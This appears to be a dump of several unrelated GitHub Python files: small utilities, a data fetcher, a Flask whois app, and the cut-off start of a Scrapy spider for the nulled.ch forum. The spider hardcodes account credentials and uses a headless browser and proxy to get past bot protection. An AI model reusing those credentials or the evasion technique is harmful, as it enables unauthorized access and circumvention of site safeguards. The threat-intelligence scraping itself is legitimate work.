),\n ]\n", "repo_name": "zestedesavoir/zds-site", "sub_path": "zds/forum/migrations/0003_auto_20151110_1145.py", "file_name": "0003_auto_20151110_1145.py", "file_ext": "py", "file_size_in_byte": 428, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 262, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 4, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "72269673793", "text": "##################### Extra Hard Starting Project ######################\nimport datetime as dt\nimport pandas as pd\nimport random\nimport smtplib\n\nnow = dt.datetime.now()\ncurr_month = now.month\ncurr_day = now.day\ntoday=(curr_month,curr_day)\n\ndata = pd.read_csv(\"birthdays.csv\")\nbirthday_dictionary = {(data['month'],data['day']):row for (index,row) in data.iterrows()}\n\nif today in birthday_dictionary:\n birthday_person = birthday_dictionary[today]\n file=f\"\\letter_templates\\letter_{random.choice(1,3)}.txt\"\n with open(file) as letter_file:\n contents = letter_file.read()\n contents = contents.replace('[NAME]',birthday_person['name'])\n\n with smtplib.SMTP('connection_name') as connection:\n connection.starttls()\n connection.login(EMAIL,PASS)\n connection.sendmail(\n from_addr=EMAIL,\n to_addrs=birthday_person['email'],\n msg=f'HAPPY BIRTHDAY\\n\\n{contents}'\n )\n\n\n\n\n\n", "repo_name": "shailparmar03/PythonProjects", "sub_path": "birthday-wisher/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 948, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 17, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "1135940239", "text": "import web\nimport requests\nimport json\nresultado = requests.get(\"https://pokeapi.co/api/v2/pokemon/geodude\")\nprint(resultado.status_code)\nprint(resultado.headers[\"Content-Type\"])\npokemon = resultado.json()\n#nombre\nname = pokemon[\"name\"]\nprint(name)\n#especie\ntype = pokemon[\"types\"]\ntypes = type[0]\ntype_0=types[\"type\"]\ntype_name = type_0[\"name\"]\nprint(type_name)\n#abilidad\nability = pokemon[\"abilities\"]\nabilities = ability[0]\nability_0 = abilities[\"ability\"]\nability_name = ability_0 [\"name\"]\nprint(ability_name)\n#url\nspecies = pokemon[\"species\"]\nurl = species[\"url\"]\nprint(url)", "repo_name": "Kevin12-0/Aplicaciones-Web-Orientadas-a-Servicios", "sub_path": "api_pokemon_api/api_consumer.py", "file_name": "api_consumer.py", "file_ext": "py", "file_size_in_byte": 579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "20218254039", "text": "\"\"\"\nHTTP-based download of files.\n\"\"\"\nfrom __future__ 
import absolute_import\n\nimport logging\nimport re\nimport time\nfrom contextlib import closing\nfrom typing import Tuple, Sequence\nfrom urllib.parse import urljoin\n\nimport feedparser\nimport requests\nfrom lxml import etree\nfrom requests import Session\nfrom requests.auth import HTTPBasicAuth\n\nfrom ._core import SimpleObject, DataSource, fetch_file, RemoteFetchException, ResultHandler, FilenameTransform\n\nDEFAULT_CONNECT_TIMEOUT_SECS = 100\n\n_log = logging.getLogger(__name__)\n\n\nclass SessionWithRedirection(requests.Session):\n \"\"\"\n Enables authentication headers to be retained for configured hosts\n \"\"\"\n\n TRUSTED_HOSTS = ['urs.earthdata.nasa.gov']\n\n def should_strip_auth(self, old_url, new_url):\n original_parsed = requests.utils.urlparse(old_url)\n redirect_parsed = requests.utils.urlparse(new_url)\n\n if (original_parsed.hostname in self.TRUSTED_HOSTS or\n redirect_parsed.hostname in self.TRUSTED_HOSTS):\n return False\n return super(SessionWithRedirection, self).should_strip_auth(old_url, new_url)\n\n def rebuild_auth(self, prepared_request, response):\n headers = prepared_request.headers\n\n url = prepared_request.url\n\n if 'Authorization' in headers:\n original_parsed = requests.utils.urlparse(response.request.url)\n redirect_parsed = requests.utils.urlparse(url)\n\n if ((original_parsed.hostname != redirect_parsed.hostname) and\n (redirect_parsed.hostname not in self.TRUSTED_HOSTS) and\n (original_parsed.hostname not in self.TRUSTED_HOSTS)):\n del headers['Authorization']\n\n\ndef filename_from_url(url):\n \"\"\"\n Get the filename component of the URL\n\n >>> filename_from_url('http://example.com/somefile.zip')\n 'somefile.zip'\n >>> filename_from_url('http://oceandata.sci.gsfc.nasa.gov/Ancillary/LUTs/modis/utcpole.dat')\n 'utcpole.dat'\n \"\"\"\n return url.split('/')[-1]\n\n\nclass HttpPostAction(SimpleObject):\n \"\"\"\n Perform a simple HTTP-Post. 
Intended for use as a 'beforehand' action.\n\n (such as posting login credentials before retrievals)\n \"\"\"\n\n def __init__(self, url, params):\n \"\"\"\n :type url: str\n :type params: dict of (str, str)\n \"\"\"\n self.url = url\n self.params = params\n\n def get_result(self, session):\n \"\"\"\n Return the closing result of the action.\n\n :type session: requests.Session\n \"\"\"\n return closing(session.post(self.url, params=self.params))\n\n\nURL = str\n\n\nclass HttpAuthAction(SimpleObject):\n \"\"\"\n Performs authentication for the session provided.\n \"\"\"\n\n def __init__(self, url, username, password,\n connection_timeout=DEFAULT_CONNECT_TIMEOUT_SECS):\n self.url = url\n self.username_password = (username, password)\n self.connection_timeout = connection_timeout\n\n def get_result(self, session):\n # This was uncommented,\n # but I think it is asking for a redirect to the login page?\n login_url = session.request('get', self.url, timeout=self.connection_timeout).url\n\n # Install into urllib.\n if self.username_password:\n session.auth = HTTPBasicAuth(*self.username_password)\n\n res = session.get(login_url, auth=self.username_password, timeout=self.connection_timeout)\n if res.status_code != 200:\n # We don't bother with reporter.file_error() as this initial fetch is critical.\n # Throw an exception instead.\n raise RemoteFetchException(\n \"Status code %r\" % res.status_code,\n '{url}\\n\\n{body}'.format(url=login_url, body=res.text)\n )\n\n return closing(res)\n\n def __repr__(self):\n fields = self.__dict__\n\n # We'd rather not log the password.\n if self.username_password:\n fields = fields.copy()\n fields['username_password'] = (self.username_password[0], '<**redacted**>')\n\n return '%s(%r)' % (self.__class__.__name__, fields)\n\n\nclass _HttpBaseSource(DataSource):\n \"\"\"\n Base class for HTTP retrievals.\n \"\"\"\n\n def __init__(self,\n target_dir: str,\n url: URL = None,\n urls: Sequence[URL] = None,\n filename_transform: FilenameTransform = None,\n beforehand: HttpPostAction = None,\n connection_timeout: float = DEFAULT_CONNECT_TIMEOUT_SECS,\n retry_count: int = 3,\n retry_delay_seconds: float = 5.0, ):\n super(_HttpBaseSource, self).__init__()\n self.target_dir = target_dir\n self.beforehand = beforehand\n\n self.filename_transform = filename_transform\n\n # Can either specify one URL or a list of URLs\n self.url = url\n self.urls = urls\n\n # Connection timeout in seconds\n self.connection_timeout = connection_timeout\n\n self.retry_count = retry_count\n self.retry_delay_seconds = retry_delay_seconds\n\n def _get_all_urls(self) -> Sequence[URL]:\n \"\"\"\n \"\"\"\n all_urls = []\n if self.urls:\n all_urls.extend(self.urls)\n if self.url:\n all_urls.append(self.url)\n return all_urls\n\n def trigger(self, reporter: ResultHandler):\n \"\"\"\n Trigger a download from the configured URLs.\n\n This will call the overridden trigger_url() function\n for each URL.\n\n \"\"\"\n all_urls = self._get_all_urls()\n if not all_urls:\n raise RuntimeError(\"HTTP type requires either 'url' or 'urls'.\")\n\n session = SessionWithRedirection()\n\n if self.beforehand:\n _log.debug('Triggering %r', self.beforehand)\n with self.beforehand.get_result(session) as res:\n if res.status_code != 200:\n _log.error('Status code %r received for %r.', res.status_code, self.beforehand)\n _log.debug('Error received text: %r', res.text)\n for url in all_urls:\n _log.debug(\"Triggering %r\", url)\n self.trigger_url(reporter, session, url)\n\n def trigger_url(self, reporter: ResultHandler, 
session: Session, url: URL):\n \"\"\"\n Trigger for the given URL. Overridden by subclasses.\n \"\"\"\n raise NotImplementedError(\"Individual URL trigger not implemented\")\n\n def _fetch_files(self,\n urls_filenames: Sequence[Tuple[URL, str]],\n reporter: ResultHandler,\n session: Session = requests,\n override_existing=False):\n \"\"\"\n Utility method for fetching HTTP URL to the target folder.\n \"\"\"\n\n def do_fetch(t: str):\n \"\"\"Fetch data to file path t\"\"\"\n\n res = session.get(url, stream=True, timeout=self.connection_timeout)\n if not res.ok:\n body = res.text\n _log.debug('Received text %r', res.text)\n reporter.file_error(url, \"Status code %r\" % res.status_code, body)\n return False\n\n with open(t, 'wb') as f:\n for chunk in res.iter_content(4096):\n if chunk:\n f.write(chunk)\n f.flush()\n return True\n\n for url, target_name in urls_filenames:\n attempt_count = 0\n while True:\n did_succeed = fetch_file(\n url,\n do_fetch,\n reporter,\n target_name,\n self.target_dir,\n filename_transform=self.filename_transform,\n override_existing=override_existing\n )\n if did_succeed or attempt_count > self.retry_count:\n break\n\n attempt_count += 1\n _log.debug('Will retry, attempt %s', attempt_count)\n time.sleep(self.retry_delay_seconds * attempt_count)\n\n\nclass HttpSource(_HttpBaseSource):\n \"\"\"\n Fetch static HTTP URLs.\n\n This is useful for unchanging URLs that need to be\n repeatedly updated.\n \"\"\"\n\n def trigger_url(self, reporter, session, url):\n \"\"\"\n Download URL, overriding existing.\n :type reporter: ResultHandler\n :type session: requests.Session\n :type url: str\n \"\"\"\n name = filename_from_url(url)\n self._fetch_files([(url, name)], reporter, session=session, override_existing=True)\n\n\nclass HttpListingSource(_HttpBaseSource):\n \"\"\"\n Fetch files from a HTTP listing page.\n\n A pattern can be supplied to limit files by filename.\n \"\"\"\n\n def __init__(self,\n target_dir,\n url=None,\n urls=None,\n name_pattern='.*',\n filename_transform=None,\n beforehand=None,\n connection_timeout=DEFAULT_CONNECT_TIMEOUT_SECS,\n retry_count: int = 3,\n retry_delay_seconds: float = 5.0):\n super(HttpListingSource, self).__init__(target_dir,\n url=url,\n urls=urls,\n filename_transform=filename_transform,\n beforehand=beforehand,\n connection_timeout=connection_timeout,\n retry_count=retry_count,\n retry_delay_seconds=retry_delay_seconds)\n self.name_pattern = name_pattern\n\n def trigger_url(self, reporter, session, url):\n \"\"\"\n Download the given listing page, and any links that match the name pattern.\n :type reporter: ResultHandler\n :type session: requests.Session\n :type url: str\n \"\"\"\n res = session.get(url, timeout=self.connection_timeout)\n if res.status_code == 404:\n _log.debug(\"Listing page doesn't exist yet. 
Skipping.\")\n return\n\n if not res.ok:\n # We don't bother with reporter.file_error() as this initial fetch is critical.\n # Throw an exception instead.\n raise RemoteFetchException(\n \"Status code %r\" % res.status_code,\n '{url}\\n\\n{body}'.format(url=url, body=res.text)\n )\n\n # pylint fails to identify native functions under our virtualenv...\n #: pylint: disable=no-member\n page = etree.fromstring(res.text, parser=etree.HTMLParser())\n\n url = res.url\n\n anchors = page.xpath('//a')\n\n # Build a list of URLs to fetch\n urls_names = []\n for anchor in anchors:\n # : :type: str\n name = anchor.text\n if 'href' not in anchor.attrib:\n continue\n\n href_ = anchor.attrib['href']\n\n if not name:\n _log.info(\"Skipping empty anchor for %r\", href_)\n continue\n\n source_url = urljoin(url, href_)\n\n if not href_.endswith(name):\n _log.info('Not a filename %r, skipping.', name)\n continue\n\n if not re.match(self.name_pattern, name):\n _log.info(\"Filename (%r) doesn't match pattern, skipping.\", name)\n continue\n urls_names.append((source_url, name))\n\n self._fetch_files(\n urls_names,\n reporter,\n session=session\n # ,override_existing=True\n )\n\n\nclass RssSource(_HttpBaseSource):\n \"\"\"\n Fetch any files from the given RSS URL.\n\n The title of feed entries is assumed to be the filename.\n \"\"\"\n\n def trigger_url(self, reporter, session, url):\n \"\"\"\n Download RSS feed and fetch missing files.\n :type reporter: ResultHandler\n :type session: requests.Session\n :type url: str\n \"\"\"\n # Fetch feed.\n res = session.get(url, timeout=self.connection_timeout)\n\n if res.status_code != 200:\n # We don't bother with reporter.file_error() as this initial fetch is critical.\n # Throw an exception instead.\n raise RemoteFetchException(\n \"Status code %r\" % res.status_code,\n '{url}\\n\\n{body}'.format(url=url, body=res.text)\n )\n\n feed = feedparser.parse(res.text)\n self._fetch_files(\n [(entry.link, entry.title) for entry in feed.entries],\n reporter,\n session=session\n # ,override_existing=True\n )\n", "repo_name": "GeoscienceAustralia/fetch", "sub_path": "fetch/http.py", "file_name": "http.py", "file_ext": "py", "file_size_in_byte": 12757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 26, "usage_type": "attribute"}, {"api_name": "requests.utils.urlparse", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 34, "usage_type": "attribute"}, {"api_name": "requests.utils.urlparse", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "requests.utils.urlparse", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 48, "usage_type": "attribute"}, {"api_name": "requests.utils.urlparse", "line_number": 49, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 49, "usage_type": "attribute"}, {"api_name": "_core.SimpleObject", "line_number": 69, "usage_type": "name"}, {"api_name": "contextlib.closing", "line_number": 90, "usage_type": "call"}, {"api_name": "_core.SimpleObject", "line_number": 96, "usage_type": "name"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 114, "usage_type": "call"}, {"api_name": "_core.RemoteFetchException", "line_number": 120, "usage_type": "call"}, {"api_name": "contextlib.closing", 
"line_number": 125, "usage_type": "call"}, {"api_name": "_core.DataSource", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 146, "usage_type": "name"}, {"api_name": "_core.FilenameTransform", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 168, "usage_type": "name"}, {"api_name": "_core.ResultHandler", "line_number": 178, "usage_type": "name"}, {"api_name": "_core.ResultHandler", "line_number": 202, "usage_type": "name"}, {"api_name": "requests.Session", "line_number": 202, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 209, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 209, "usage_type": "name"}, {"api_name": "_core.ResultHandler", "line_number": 210, "usage_type": "name"}, {"api_name": "requests.Session", "line_number": 211, "usage_type": "name"}, {"api_name": "_core.fetch_file", "line_number": 237, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 251, "usage_type": "call"}, {"api_name": "_core.RemoteFetchException", "line_number": 315, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 322, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 322, "usage_type": "name"}, {"api_name": "lxml.etree.HTMLParser", "line_number": 322, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 342, "usage_type": "call"}, {"api_name": "re.match", "line_number": 348, "usage_type": "call"}, {"api_name": "_core.RemoteFetchException", "line_number": 381, "usage_type": "call"}, {"api_name": "feedparser.parse", "line_number": 386, "usage_type": "call"}]} +{"seq_id": "72653104833", "text": "from flask import Flask, render_template, jsonify, request\nimport whois\nimport datetime\n\napp = Flask(__name__)\napp.debug = True\napp.config['TEMPLATE_AUTO_RELOAD'] = True\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/search', methods=['POST'])\ndef search():\n url = request.form['url']\n w = whois.whois(url)\n w.expiration_date # dates converted to datetime object\n datetime.datetime(2013, 6, 26, 0, 0)\n w.text\n return render_template('search.html', url=url, record=w)\n\nif __name__ == '__main__':\n app.run(debug=True, port=8000, host='127.0.0.1')", "repo_name": "GrahamMorbyDev/whois-flask", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "whois.whois", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "30836310932", "text": "\"\"\"options ={\"program_type\": \"light\",\n \"input_type\":\"single\",\n \"job_name\": \"default_name\", \n \"ref_ls\": [],\n \"thresh\":70.9\n\n }\"\"\"\nfrom dtypes.Frame import Frame\nfrom os import mkdir\nimport sqlite3 \nimport uuid\nfrom utils.sql_utils import adapt_array,convert_array\nfrom numpy import ndarray,array\nclass Job:\n def __init__(self,options,db_ref):\n self.job_name = options[\"job_name\"]\n self.job_id = 
str(uuid.uuid4()).replace('-','') + \"_\" + self.job_name\n self.type = int(options[\"input_type\"])\n self.tags = str(options[\"tags\"])\n self.frame_ls = []\n self.frame_ref_ls = []\n mkdir(\"./job-data/\" + self.job_name)\n self.frame_paths = options['frame_paths']\n self.create_frames(options,db_ref,options[\"frame_paths\"])\n self.constants = options[\"constants\"]\n self.update_ref_ls()\n self.add_job_db()\n\n def __repr__(self):\n s = \"(JOB) job_name:\" + self.job_name + \"\\t job_id:\" + self.job_id\n s = s + \"\\t type:\" + str(type) + \"\\t tags\" + str(self.tags)\n return s\n\n def update_ref_ls(self):\n for frame in self.frame_ls:\n self.frame_ref_ls.append(frame.id)\n print(\"job frame ref ls updated\")\n\n def add_job_db(self):\n sqlite3.register_adapter(ndarray,adapt_array)\n sqlite3.register_converter(\"array\",convert_array)\n conn = sqlite3.connect(\"/Users/jackkelly/PycharmProjects/win_break/dash_app/data/pore.db\", detect_types=sqlite3.PARSE_DECLTYPES)\n \n out_path = \".\" + \"/job-data/\" + self.job_name\n sql_str = ''' insert into jobs_index(job_id,job_name,job_path,job_type,tags,frame_ls,frame_names)\n VALUES(?,?,?,?,?,?,?)'''\n conn.execute(sql_str,(self.job_id,self.job_name,out_path,self.type,self.tags,array(self.frame_ref_ls),array(self.frame_paths)))\n conn.commit()\n conn.close()\n #print(\"image data pushed to database\")\n\n\n def create_frames(self, options,db_ref,frame_paths):\n i =0\n out_path = \"/job-data/\"\n for fpath in frame_paths:\n print(\"fpath\", fpath)\n f = Frame(fpath,out_path,options[\"program_type\"],\n options[\"constants\"],\n db_ref,\n self.job_name,\n self.tags)\n self.frame_ls.append(f)\n print(\"frames have been finished\")\n", "repo_name": "Jack-kelly-22/ps-4", "sub_path": "dtypes/job.py", "file_name": "job.py", "file_ext": "py", "file_size_in_byte": 2409, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "uuid.uuid4", "line_number": 17, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlite3.register_adapter", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 40, "usage_type": "argument"}, {"api_name": "utils.sql_utils.adapt_array", "line_number": 40, "usage_type": "argument"}, {"api_name": "sqlite3.register_converter", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.sql_utils.convert_array", "line_number": 41, "usage_type": "argument"}, {"api_name": "sqlite3.connect", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlite3.PARSE_DECLTYPES", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "dtypes.Frame.Frame", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "72042519235", "text": "import geopandas as gpd\nimport json\nimport pygeohash as gh\nfrom shapely.geometry import Polygon, MultiPolygon, shape\n\ndef extract_vertices(geometry):\n vertices = []\n geom_shape = shape(geometry)\n for coord in geom_shape.exterior.coords:\n lon, lat = coord[:2]\n vertices.append((lon, lat))\n return vertices\n\ndef longest_common_geohash_prefix(geohashes):\n if not geohashes:\n return \"\"\n\n prefix = geohashes[0]\n for geohash in geohashes[1:]:\n i = 0\n while i < len(prefix) and i < len(geohash) and prefix[i] == geohash[i]:\n i += 1\n prefix = prefix[:i]\n\n return prefix\n\ndef geohash_json_feature_representation(vertices, name):\n # Generate the geohashes for a 
feature\n geohashes = [gh.encode(vertex[1], vertex[0], precision=10) for vertex in vertices]\n\n # Find the longest common prefix\n prefix = longest_common_geohash_prefix(geohashes)\n\n # Trim the prefix from each geohash\n trimmed_geohashes = [geohash[len(prefix):] for geohash in geohashes]\n\n json_output = {\n 'n': name,\n 'g': trimmed_geohashes,\n 'p': prefix\n }\n return json_output\n\n# Path to the Shapefile\nshapefile_path = '/path/to/shapefile.shp'\n\n# Read the Shapefile using geopandas\ndata = gpd.read_file(shapefile_path)\ndata = data[data.geometry.geom_type == 'Polygon']\ndata = data.to_crs(\"EPSG:4326\")\n\nfeatures = []\n\nfor index, feature in data.iterrows():\n vertices = extract_vertices(feature['geometry'])\n features.append(geohash_json_feature_representation(vertices, feature['NAME']))\n\n# Save the JSON output to file\noutput_json = '/path/to/output.json'\n\nwith open(output_json, 'w') as file:\n file.write(json.dumps(features))\n\nprint('JSON exported successfully.')\n", "repo_name": "Tawitwins/geocoding-blockchain", "sub_path": "geohashing_prefix_json.py", "file_name": "geohashing_prefix_json.py", "file_ext": "py", "file_size_in_byte": 1752, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "shapely.geometry.shape", "line_number": 8, "usage_type": "call"}, {"api_name": "pygeohash.encode", "line_number": 29, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "33398148578", "text": "#!python3\nimport paho.mqtt.client as mqtt #import the client1\nimport time\nimport pymysql\n\ndef on_connect(client, userdata, flags, rc):\n if rc==0:\n client.connected_flag=True #set flag\n print(\"connected OK\")\n else:\n print(\"Bad connection Returned code=\",rc)\n\ndef on_message(client, userdata, message):\n time.sleep(1)\n\n\n con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"1234\", database=\"Gym\")\n cur = con.cursor()\n cur.execute(\"SELECT MAX(userid) from user\")\n g = cur.fetchone()\n cur.execute( \"update user set phone=%s WHERE userid=%s\",(str(message.payload.decode(\"utf-8\")), g))\n\n print(\"received message =\",str(message.payload.decode(\"utf-8\")))\nbl =True\nk=0\nwhile (bl==True):\n mqtt.Client.connected_flag=False#create flag in class\n broker=\"broker.hivemq.com\"\n port=1883\n\n client = mqtt.Client(\"clientId-lUfDDEJCUm\") #create new instance\n #client.username_pw_set(username=\"Ubido\",password=\"password\")\n\n client.on_connect=on_connect #bind call back function\n client.on_message=on_message\n client.loop_start()\n print(\"Connecting to broker \",broker)\n try:\n client.connect(broker) #connect to broker\n\n\n except Exception as e:\n print(e)\n\n while not client.connected_flag: #wait in loop\n print(\"In wait loop\")\n time.sleep(1)\n print(\"in Main Loop\")\n\n print(\"subscribing \")\n client.subscribe(\"Room/Lamp\") # subscribe\n time.sleep(2)\n #print(\"publishing \")\n\n #client.publish(\"Room/Lamp\", \"1\") # publish\n\n time.sleep(4)\n client.loop_stop() #Stop loop\n print(\"here\",client.subscribe(\"Room/Lamp\"))\n\n\n client.disconnect() # disconnect\n\n\n #client.publish(\"house/light\", 1)", "repo_name": "mag1i/Gym-facerec", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1846, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", 
"pt": "61", "api": [{"api_name": "time.sleep", "line_number": 14, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 17, "usage_type": "call"}, {"api_name": "paho.mqtt.client.Client", "line_number": 27, "usage_type": "attribute"}, {"api_name": "paho.mqtt.client", "line_number": 27, "usage_type": "name"}, {"api_name": "paho.mqtt.client.Client", "line_number": 31, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 31, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "72565393794", "text": "# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nfrom typing import List\n\nclass Solution:\n \n def __init__(self):\n self.inorder = []\n \n def inorderTraversal(self, root: TreeNode) -> List[int]:\n \n if root :\n \n self.inorderTraversal( root.left )\n self.inorder.append( root.val )\n self.inorderTraversal( root.right) \n \n return self.inorder\n \n else:\n return []\n\n\n# N : number of node in binary tree with given root\n\n## Time Complexity:\n#\n# Inorder traversal visits each node once, every single visit costs O(1).\n# There are n nodes in binary tree, thus totally it takes O( n ).\n\n## Space Complexity:\n#\n# The overhead in time is to maintain call stack for inorder traversal,\n# the call depth is O( n ) at most.\n\ndef test_bench():\n\n root = TreeNode(1)\n\n root.right = TreeNode(2)\n\n root.right.left = TreeNode(3)\n\n in_order_traversal = Solution().inorderTraversal(root)\n\n # expected output:\n '''\n [1, 3, 2]\n '''\n print( in_order_traversal )\n\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()", "repo_name": "brianchiang-tw/leetcode", "sub_path": "No_0094_Binary Tree Inorder Traversal/binary_tree_inorder_traversal_recursive.py", "file_name": "binary_tree_inorder_traversal_recursive.py", "file_ext": "py", "file_size_in_byte": 1248, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 47, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "4234516133", "text": "import os\nimport re\nimport time\nimport uuid\nimport json\n\nfrom datetime import datetime\nfrom scrapy.utils.gz import gunzip\n\nfrom selenium.webdriver import (\n Chrome,\n ChromeOptions\n)\nfrom scrapy import (\n Request,\n FormRequest,\n Selector\n)\nfrom scraper.base_scrapper import (\n SitemapSpider,\n SiteMapScrapper,\n PROXY_USERNAME,\n PROXY_PASSWORD,\n PROXY\n)\n\n\nUSERNAME = \"umeshpathak@protonmail.com\"\nPASSWORD = \"4hr63yh38a61SDW0\"\n\nUSER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) '\\\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\\\n 'Chrome/81.0.4044.138 Safari/537.36'\n\n\nclass NulledChSpider(SitemapSpider):\n name = 'nulledch_spider'\n\n # Url stuffs\n base_url = 'https://www.nulled.ch/'\n login_url = 'https://www.nulled.ch/user-login'\n \n # Xpath stuffs\n login_form_xpath = '//form[@method=\"post\"]'\n forum_xpath = '//a[contains(@href, \"forum-\")]/@href'\n pagination_xpath = '//div[@class=\"pagination\"]'\\\n '/a[@class=\"pagination_next\"]/@href'\n thread_xpath = '//tr[@class=\"inline_row\"]'\n thread_first_page_xpath = './/span[contains(@id,\"tid_\")]/a/@href'\n thread_last_page_xpath = './/td[contains(@class,\"forumdisplay_\")]/div'\\\n 
'/div/span[contains(@class,\"smalltext\")]'\\\n '/a[last()]/@href'\n thread_date_xpath = './/td[contains(@class,\"forumdisplay\")]'\\\n '/div[@class=\"lastpost smalltext\"]/text()[1]|'\\\n './/td[contains(@class,\"forumdisplay\")]'\\\n '/div[@class=\"lastpost smalltext\"]/span/@title'\n thread_pagination_xpath = '//div[@class=\"pagination\"]'\\\n '//a[@class=\"pagination_previous\"]/@href'\n thread_page_xpath = '//span[@class=\"pagination_current\"]/text()'\n post_date_xpath = '//div[@class=\"post_content\"]/preceding-sibling::'\\\n 'span[1]/text()[1]|//div[@class=\"post_content\"]'\\\n '/preceding-sibling::span[1]/span/@title'\\\n\n avatar_xpath = '//div[@class=\"author_avatar\"]/a/img/@src'\n\n # Login Failed Message\n login_failed_xpath = '//div[@class=\"error\"]'\n\n # Recaptcha stuffs\n recaptcha_site_key_xpath = '//div[@class=\"g-recaptcha\"]/@data-sitekey'\n\n # Regex stuffs\n topic_pattern = re.compile(\n r'thread-(\\d+)',\n re.IGNORECASE\n )\n avatar_name_pattern = re.compile(\n r\".*/(\\S+\\.\\w+)\",\n re.IGNORECASE\n )\n\n # Other settings\n use_proxy = \"On\"\n sitemap_datetime_format = '%m-%d-%Y'\n post_datetime_format = '%m-%d-%Y'\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.headers.update({\n 'User-Agent': USER_AGENT\n })\n\n def get_cookies(self, use_proxy=False):\n # Init options\n options = ChromeOptions()\n options.add_argument(\"--headless\")\n options.add_argument(\"--no-sandbox\")\n if use_proxy:\n proxy = PROXY % (PROXY_USERNAME, PROXY_PASSWORD)\n options.add_argument(f'--proxy-server={proxy}')\n options.add_argument(f'user-agent={USER_AGENT}')\n\n # Init web driver arguments\n webdriver_kwargs = {\n \"executable_path\": \"/usr/local/bin/chromedriver\",\n \"options\": options\n }\n browser = Chrome(**webdriver_kwargs)\n browser.get(self.login_url)\n time.sleep(20)\n cookies = browser.get_cookies()\n browser.quit()\n bypass_cookies = {\n c.get(\"name\"): c.get(\"value\") for c in cookies\n }\n return bypass_cookies\n\n def start_requests(self):\n cookies = self.get_cookies(self.use_proxy)\n yield Request(\n url=self.login_url,\n callback=self.proceed_for_login,\n headers=self.headers,\n dont_filter=True,\n 